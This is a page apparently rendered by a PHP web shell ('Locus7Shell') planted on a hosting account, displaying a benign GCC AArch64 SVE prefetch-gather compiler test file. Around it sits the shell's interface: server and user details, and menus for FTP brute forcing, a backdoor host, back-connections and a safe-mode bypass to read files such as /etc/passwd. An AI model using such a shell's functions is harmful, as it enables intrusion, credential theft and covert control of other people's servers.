Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve/acle/asm/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     prfw_gather.c (6.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-final { check-function-bodies "**" "" "-DCHECK_ASM" { target { ! ilp32 } } } } */

#include "test_sve_acle.h"

/*
** prfw_gather_u32base:
**    prfw    pldl1keep, p0, \[z0\.s\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_u32base, svuint32_t,
             svprfw_gather_u32base (p0, z0, SV_PLDL1KEEP),
             svprfw_gather (p0, z0, SV_PLDL1KEEP))

/*
** prfw_gather_u64base:
**    prfw    pldl1strm, p0, \[z0\.d\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_u64base, svuint64_t,
             svprfw_gather_u64base (p0, z0, SV_PLDL1STRM),
             svprfw_gather (p0, z0, SV_PLDL1STRM))

/*
** prfw_gather_x0_u32base_index:
**    lsl    (x[0-9]+), x0, #?2
**    prfb    pldl2keep, p0, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_x0_u32base_index, svuint32_t,
             svprfw_gather_u32base_index (p0, z0, x0, SV_PLDL2KEEP),
             svprfw_gather_index (p0, z0, x0, SV_PLDL2KEEP))

/*
** prfw_gather_m1_u32base_index:
**    mov    (x[0-9]+), #?-4
**    prfb    pldl2strm, p0, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_m1_u32base_index, svuint32_t,
             svprfw_gather_u32base_index (p0, z0, -1, SV_PLDL2STRM),
             svprfw_gather_index (p0, z0, -1, SV_PLDL2STRM))

/*
** prfw_gather_0_u32base_index:
**    prfw    pldl3keep, p0, \[z0\.s\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_0_u32base_index, svuint32_t,
             svprfw_gather_u32base_index (p0, z0, 0, SV_PLDL3KEEP),
             svprfw_gather_index (p0, z0, 0, SV_PLDL3KEEP))

/*
** prfw_gather_5_u32base_index:
**    prfw    pldl3strm, p0, \[z0\.s, #20\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_5_u32base_index, svuint32_t,
             svprfw_gather_u32base_index (p0, z0, 5, SV_PLDL3STRM),
             svprfw_gather_index (p0, z0, 5, SV_PLDL3STRM))

/*
** prfw_gather_31_u32base_index:
**    prfw    pstl1keep, p0, \[z0\.s, #124\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_31_u32base_index, svuint32_t,
             svprfw_gather_u32base_index (p0, z0, 31, SV_PSTL1KEEP),
             svprfw_gather_index (p0, z0, 31, SV_PSTL1KEEP))

/*
** prfw_gather_32_u32base_index:
**    mov    (x[0-9]+), #?128
**    prfb    pstl1strm, p0, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_32_u32base_index, svuint32_t,
             svprfw_gather_u32base_index (p0, z0, 32, SV_PSTL1STRM),
             svprfw_gather_index (p0, z0, 32, SV_PSTL1STRM))

/*
** prfw_gather_x0_u64base_index:
**    lsl    (x[0-9]+), x0, #?2
**    prfb    pstl2keep, p0, \[\1, z0\.d\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_x0_u64base_index, svuint64_t,
             svprfw_gather_u64base_index (p0, z0, x0, SV_PSTL2KEEP),
             svprfw_gather_index (p0, z0, x0, SV_PSTL2KEEP))

/*
** prfw_gather_m1_u64base_index:
**    mov    (x[0-9]+), #?-4
**    prfb    pstl2strm, p0, \[\1, z0\.d\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_m1_u64base_index, svuint64_t,
             svprfw_gather_u64base_index (p0, z0, -1, SV_PSTL2STRM),
             svprfw_gather_index (p0, z0, -1, SV_PSTL2STRM))

/*
** prfw_gather_0_u64base_index:
**    prfw    pstl3keep, p0, \[z0\.d\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_0_u64base_index, svuint64_t,
             svprfw_gather_u64base_index (p0, z0, 0, SV_PSTL3KEEP),
             svprfw_gather_index (p0, z0, 0, SV_PSTL3KEEP))

/*
** prfw_gather_5_u64base_index:
**    prfw    pstl3strm, p0, \[z0\.d, #20\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_5_u64base_index, svuint64_t,
             svprfw_gather_u64base_index (p0, z0, 5, SV_PSTL3STRM),
             svprfw_gather_index (p0, z0, 5, SV_PSTL3STRM))

/*
** prfw_gather_31_u64base_index:
**    prfw    pldl1keep, p0, \[z0\.d, #124\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_31_u64base_index, svuint64_t,
             svprfw_gather_u64base_index (p0, z0, 31, SV_PLDL1KEEP),
             svprfw_gather_index (p0, z0, 31, SV_PLDL1KEEP))

/*
** prfw_gather_32_u64base_index:
**    mov    (x[0-9]+), #?128
**    prfb    pldl1strm, p0, \[\1, z0\.d\]
**    ret
*/
TEST_PREFETCH_GATHER_ZS (prfw_gather_32_u64base_index, svuint64_t,
             svprfw_gather_u64base_index (p0, z0, 32, SV_PLDL1STRM),
             svprfw_gather_index (p0, z0, 32, SV_PLDL1STRM))

/*
** prfw_gather_x0_s32index:
**    prfw    pldl2keep, p0, \[x0, z0\.s, sxtw 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_x0_s32index, svint32_t,
             svprfw_gather_s32index (p0, x0, z0, SV_PLDL2KEEP),
             svprfw_gather_index (p0, x0, z0, SV_PLDL2KEEP))

/*
** prfw_gather_s32index:
**    prfw    pldl2strm, p0, \[x0, z1\.s, sxtw 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_s32index, svint32_t,
             svprfw_gather_s32index (p0, x0, z1, SV_PLDL2STRM),
             svprfw_gather_index (p0, x0, z1, SV_PLDL2STRM))

/*
** prfw_gather_x0_u32index:
**    prfw    pldl3keep, p0, \[x0, z0\.s, uxtw 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_x0_u32index, svuint32_t,
             svprfw_gather_u32index (p0, x0, z0, SV_PLDL3KEEP),
             svprfw_gather_index (p0, x0, z0, SV_PLDL3KEEP))

/*
** prfw_gather_u32index:
**    prfw    pldl3strm, p0, \[x0, z1\.s, uxtw 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_u32index, svuint32_t,
             svprfw_gather_u32index (p0, x0, z1, SV_PLDL3STRM),
             svprfw_gather_index (p0, x0, z1, SV_PLDL3STRM))

/*
** prfw_gather_x0_s64index:
**    prfw    pstl1keep, p0, \[x0, z0\.d, lsl 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_x0_s64index, svint64_t,
             svprfw_gather_s64index (p0, x0, z0, SV_PSTL1KEEP),
             svprfw_gather_index (p0, x0, z0, SV_PSTL1KEEP))

/*
** prfw_gather_s64index:
**    prfw    pstl1strm, p0, \[x0, z1\.d, lsl 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_s64index, svint64_t,
             svprfw_gather_s64index (p0, x0, z1, SV_PSTL1STRM),
             svprfw_gather_index (p0, x0, z1, SV_PSTL1STRM))

/*
** prfw_gather_ext_s64index:
**    prfw    pstl1strm, p0, \[x0, z1\.d, sxtw 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_ext_s64index, svint64_t,
             svprfw_gather_s64index (p0, x0, svextw_s64_x (p0, z1), SV_PSTL1STRM),
             svprfw_gather_index (p0, x0, svextw_x (p0, z1), SV_PSTL1STRM))

/*
** prfw_gather_x0_u64index:
**    prfw    pstl2keep, p0, \[x0, z0\.d, lsl 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_x0_u64index, svuint64_t,
             svprfw_gather_u64index (p0, x0, z0, SV_PSTL2KEEP),
             svprfw_gather_index (p0, x0, z0, SV_PSTL2KEEP))

/*
** prfw_gather_u64index:
**    prfw    pstl2strm, p0, \[x0, z1\.d, lsl 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_u64index, svuint64_t,
             svprfw_gather_u64index (p0, x0, z1, SV_PSTL2STRM),
             svprfw_gather_index (p0, x0, z1, SV_PSTL2STRM))

/*
** prfw_gather_ext_u64index:
**    prfw    pstl2strm, p0, \[x0, z1\.d, uxtw 2\]
**    ret
*/
TEST_PREFETCH_GATHER_SZ (prfw_gather_ext_u64index, svuint64_t,
             svprfw_gather_u64index (p0, x0, svextw_u64_x (p0, z1), SV_PSTL2STRM),
             svprfw_gather_index (p0, x0, svextw_x (p0, z1), SV_PSTL2STRM))

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0064 ]--